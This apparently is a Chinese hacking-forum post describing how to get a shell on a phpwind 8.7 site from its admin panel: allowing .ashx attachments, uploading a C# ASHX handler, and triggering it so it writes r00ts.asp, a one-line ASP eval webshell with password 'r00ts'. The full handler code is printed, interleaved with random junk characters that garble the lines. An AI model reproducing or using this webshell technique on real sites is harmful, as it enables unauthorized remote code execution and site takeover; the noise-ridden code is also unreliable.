phpwind 8.7 后台拿shell

admin

首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小

9 P$ M8 ]0 `3 ?: B% t群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx

2 r' o, x7 C% b发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
* X* V) {2 A* E& b/ y
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx

打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
# m6 e8 K- n+ a8 k* p4 D
* M3 X7 M1 |: J" D9 Z! `2 K下面是代码:
) i( n3 S; f: I4 Y
4 x9 f" z( k* [; k' k$ F% p. i<%@ WebHandler Language="C#"Class="Handler" %>
& g4 x4 E- N9 j6 v( k% g9 Tusing System;
2 \. s  `# q/ W. T$ Kusing System.Web;
using System.IO;
public class Handler : IHttpHandler {
, x7 I3 w+ U8 O! W  p; Xpublic void ProcessRequest (HttpContext context) {
+ S: q( U6 Z0 q* Q8 e9 qcontext.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
- c, W/ l) _8 A- l& E% p) s8 ]file1.Write("<%eval request(\"r00ts\")%>");
file1.Flush();
" C8 r- e, |% n2 Z/ L1 |5 ofile1.Close();
}
1 j$ x0 \6 [7 w( N! i3 l7 _$ epublic bool IsReusable {
get {
return false;
}
}
) T2 I/ W& v4 |6 z0 {+ W}
2 M' T) T" f- l* _